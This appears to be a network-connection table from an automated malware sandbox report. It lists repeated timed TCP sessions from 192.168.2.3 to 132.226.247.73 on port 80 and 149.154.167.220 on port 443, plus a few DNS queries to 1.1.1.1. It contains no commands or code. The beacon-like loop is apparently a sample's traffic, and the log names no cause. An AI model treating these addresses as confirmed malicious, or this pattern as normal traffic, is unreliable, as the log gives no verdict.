                                                                                                            Jan 10, 2025 22:32:36.645566940 CET5004580192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:36.645618916 CET8050047132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:36.645812035 CET5004780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:36.645812035 CET5004780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:36.650607109 CET8050047132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:37.318486929 CET8050047132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:37.319823027 CET50048443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:37.319864035 CET44350048149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:37.320048094 CET50048443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:37.320379972 CET50048443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:37.320394039 CET44350048149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:37.359749079 CET5004780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:37.957845926 CET44350048149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:37.962557077 CET50048443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:37.962572098 CET44350048149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:37.963331938 CET50048443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:37.963339090 CET44350048149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:38.396169901 CET44350048149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:38.396249056 CET44350048149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:38.396306038 CET50048443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:38.396855116 CET50048443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:38.399920940 CET5004780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:38.401021957 CET5004980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:38.405852079 CET8050047132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:38.405932903 CET5004780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:38.406742096 CET8050049132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:38.406829119 CET5004980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:38.407104015 CET5004980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:38.412826061 CET8050049132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:39.079986095 CET8050049132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:39.098979950 CET50050443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:39.099018097 CET44350050149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:39.099102020 CET50050443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:39.103265047 CET50050443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:39.103274107 CET44350050149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:39.125412941 CET5004980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:39.726206064 CET44350050149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:39.727818012 CET50050443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:39.727840900 CET44350050149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:39.727916956 CET50050443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:39.727922916 CET44350050149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:40.009449005 CET44350050149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:40.009541988 CET44350050149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:40.009615898 CET50050443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:40.009979963 CET50050443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:40.012761116 CET5004980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:40.013820887 CET5005180192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:40.017714977 CET8050049132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:40.017795086 CET5004980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:40.018554926 CET8050051132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:40.018627882 CET5005180192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:40.018714905 CET5005180192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:40.023516893 CET8050051132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:40.723712921 CET8050051132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:40.724798918 CET50052443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:40.724841118 CET44350052149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:40.724919081 CET50052443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:40.725169897 CET50052443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:40.725186110 CET44350052149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:40.765984058 CET5005180192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:41.332916021 CET44350052149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:41.334831953 CET50052443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:41.334856033 CET44350052149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:41.334949017 CET50052443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:41.334956884 CET44350052149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:41.690783024 CET44350052149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:41.690865993 CET44350052149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:41.691129923 CET50052443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:41.691345930 CET50052443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:41.694014072 CET5005180192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:41.695091963 CET5005380192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:41.699033022 CET8050051132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:41.699112892 CET5005180192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:41.699950933 CET8050053132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:41.700042963 CET5005380192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:41.700366020 CET5005380192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:41.705179930 CET8050053132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:42.399460077 CET8050053132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:42.400676966 CET50054443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:42.400728941 CET44350054149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:42.400810957 CET50054443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:42.401176929 CET50054443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:42.401196957 CET44350054149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:42.453506947 CET5005380192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:43.018012047 CET44350054149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:43.019512892 CET50054443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:43.019534111 CET44350054149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:43.019666910 CET50054443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:43.019671917 CET44350054149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:43.422667027 CET44350054149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:43.422765970 CET44350054149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:43.423093081 CET50054443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:43.423207998 CET50054443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:43.426372051 CET5005380192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:43.427475929 CET5005580192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:43.431396008 CET8050053132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:43.431464911 CET5005380192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:43.432368994 CET8050055132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:43.432451963 CET5005580192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:43.432569027 CET5005580192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:43.437361956 CET8050055132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:44.133246899 CET8050055132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:44.134448051 CET50056443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:44.134495974 CET44350056149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:44.134556055 CET50056443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:44.134841919 CET50056443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:44.134852886 CET44350056149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:44.187886953 CET5005580192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:44.753371000 CET44350056149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:44.755068064 CET50056443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:44.755101919 CET44350056149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:44.755191088 CET50056443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:44.755197048 CET44350056149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:45.173753977 CET44350056149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:45.173872948 CET44350056149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:45.174036026 CET50056443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:45.174596071 CET50056443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:45.179150105 CET5005580192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:45.180109024 CET5005780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:45.184118986 CET8050055132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:45.184194088 CET5005580192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:45.184952021 CET8050057132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:45.185213089 CET5005780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:45.185302973 CET5005780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:45.190042973 CET8050057132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:45.869453907 CET8050057132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:45.881046057 CET50058443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:45.881098032 CET44350058149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:45.881181002 CET50058443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:45.882450104 CET50058443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:45.882462978 CET44350058149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:45.922259092 CET5005780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:46.489509106 CET44350058149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:46.491188049 CET50058443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:46.491215944 CET44350058149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:46.491283894 CET50058443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:46.491292953 CET44350058149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:46.910789967 CET44350058149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:46.910901070 CET44350058149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:46.910975933 CET50058443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:46.911307096 CET50058443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:46.914859056 CET5005780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:46.915863037 CET5005980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:46.919883966 CET8050057132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:46.919951916 CET5005780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:46.920757055 CET8050059132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:46.920833111 CET5005980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:46.920924902 CET5005980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:46.925709963 CET8050059132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:47.600188017 CET8050059132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:47.601461887 CET50060443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:47.601516962 CET44350060149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:47.601630926 CET50060443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:47.601949930 CET50060443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:47.601968050 CET44350060149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:47.641020060 CET5005980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:48.235907078 CET44350060149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:48.272845030 CET50060443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:48.272876978 CET44350060149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:48.273027897 CET50060443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:48.273037910 CET44350060149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:48.558137894 CET44350060149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:48.558245897 CET44350060149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:48.558330059 CET50060443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:48.558801889 CET50060443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:48.561820030 CET5005980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:48.563036919 CET5006180192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:48.566782951 CET8050059132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:48.566844940 CET5005980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:48.567936897 CET8050061132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:48.568038940 CET5006180192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:48.568164110 CET5006180192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:48.572916031 CET8050061132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:49.254148006 CET8050061132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:49.255429029 CET50062443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:49.255470037 CET44350062149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:49.255526066 CET50062443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:49.255986929 CET50062443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:49.256000996 CET44350062149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:49.297267914 CET5006180192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:49.873855114 CET44350062149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:49.876137018 CET50062443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:49.876151085 CET44350062149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:49.876368046 CET50062443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:49.876384020 CET44350062149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:50.365202904 CET44350062149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:50.365293980 CET44350062149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:50.365819931 CET50062443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:50.365819931 CET50062443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:50.368936062 CET5006180192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:50.370141983 CET5006380192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:50.373972893 CET8050061132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:50.374049902 CET5006180192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:50.374902964 CET8050063132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:50.374968052 CET5006380192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:50.375056028 CET5006380192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:50.379782915 CET8050063132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:51.058772087 CET8050063132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:51.060103893 CET50064443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:51.060156107 CET44350064149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:51.060219049 CET50064443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:51.060627937 CET50064443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:51.060641050 CET44350064149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:51.109783888 CET5006380192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:51.678354979 CET44350064149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:51.680134058 CET50064443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:51.680164099 CET44350064149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:51.682636023 CET50064443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:51.682641983 CET44350064149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:52.064011097 CET44350064149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:52.064097881 CET44350064149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:52.066638947 CET50064443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:52.066884995 CET50064443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:52.069850922 CET5006380192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:52.070765018 CET5006580192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:52.075668097 CET8050065132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:52.076401949 CET8050063132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:52.076493025 CET5006380192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:52.076622963 CET5006580192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:52.076622963 CET5006580192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:52.081475019 CET8050065132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:52.767127991 CET8050065132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:52.768431902 CET50066443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:52.768490076 CET44350066149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:52.768687963 CET50066443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:52.769015074 CET50066443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:52.769026041 CET44350066149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:52.813065052 CET5006580192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:53.377065897 CET44350066149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:53.378750086 CET50066443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:53.378771067 CET44350066149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:53.378823996 CET50066443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:53.378832102 CET44350066149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:53.609023094 CET44350066149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:53.609132051 CET44350066149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:53.613234043 CET50066443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:53.635360956 CET50066443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:53.638825893 CET5006580192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:53.642220974 CET5006780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:53.643955946 CET8050065132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:53.645277023 CET5006580192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:53.647075891 CET8050067132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:53.650755882 CET5006780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:53.650755882 CET5006780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:53.655653954 CET8050067132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:54.341869116 CET8050067132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:54.346601963 CET50068443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:54.346649885 CET44350068149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:54.351093054 CET50068443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:54.351093054 CET50068443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:54.351126909 CET44350068149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:54.391132116 CET5006780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:54.991564989 CET44350068149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:54.999075890 CET50068443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:54.999106884 CET44350068149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:54.999253988 CET50068443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:54.999265909 CET44350068149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:55.407962084 CET44350068149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:55.408080101 CET44350068149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:55.408147097 CET50068443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:55.408734083 CET50068443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:55.413398027 CET5006780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:55.414397001 CET5006980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:55.418416023 CET8050067132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:55.418482065 CET5006780192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:55.419214010 CET8050069132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:55.419284105 CET5006980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:55.419482946 CET5006980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:55.424216032 CET8050069132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:56.110635042 CET8050069132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:56.111988068 CET50070443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:56.112011909 CET44350070149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:56.112287045 CET50070443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:56.112687111 CET50070443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:56.112694979 CET44350070149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:56.156666040 CET5006980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:56.733030081 CET44350070149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:56.735671997 CET50070443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:56.735706091 CET44350070149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:56.735956907 CET50070443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:56.735965014 CET44350070149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:57.073813915 CET44350070149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:57.073914051 CET44350070149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:32:57.073978901 CET50070443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:57.074546099 CET50070443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:32:57.078309059 CET5006980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:57.083359003 CET8050069132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:57.083442926 CET5006980192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:57.083910942 CET5007180192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:57.088835955 CET8050071132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:57.088924885 CET5007180192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:57.089241028 CET5007180192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:32:57.094166994 CET8050071132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:57.772167921 CET8050071132.226.247.73192.168.2.3
                                                                                                            Jan 10, 2025 22:32:57.813607931 CET5007180192.168.2.3132.226.247.73
                                                                                                            Jan 10, 2025 22:33:00.404079914 CET50072443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:33:00.404151917 CET44350072149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:33:00.404246092 CET50072443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:33:00.404644012 CET50072443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:33:00.404660940 CET44350072149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:33:01.009614944 CET44350072149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:33:01.011674881 CET50072443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:33:01.011706114 CET44350072149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:33:01.011790991 CET50072443192.168.2.3149.154.167.220
                                                                                                            Jan 10, 2025 22:33:01.011796951 CET44350072149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:33:01.420043945 CET44350072149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:33:01.420137882 CET44350072149.154.167.220192.168.2.3
                                                                                                            Jan 10, 2025 22:33:01.420206070 CET50072443192.168.2.3149.154.167.220
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 10, 2025 22:31:27.721029043 CET5998953192.168.2.31.1.1.1
                                                                                                            Jan 10, 2025 22:31:27.727757931 CET53599891.1.1.1192.168.2.3
                                                                                                            Jan 10, 2025 22:31:28.809241056 CET5793953192.168.2.31.1.1.1
                                                                                                            Jan 10, 2025 22:31:28.818209887 CET53579391.1.1.1192.168.2.3
                                                                                                            Jan 10, 2025 22:31:33.623233080 CET6407153192.168.2.31.1.1.1
                                                                                                            Jan 10, 2025 22:31:33.631084919 CET53640711.1.1.1192.168.2.3
                                                                                                            Jan 10, 2025 22:31:35.086478949 CET5881253192.168.2.31.1.1.1
                                                                                                            Jan 10, 2025 22:31:35.093919992 CET53588121.1.1.1192.168.2.3
                                                                                                            Jan 10, 2025 22:31:41.835819006 CET6408553192.168.2.31.1.1.1
                                                                                                            Jan 10, 2025 22:31:41.842905998 CET53640851.1.1.1192.168.2.3
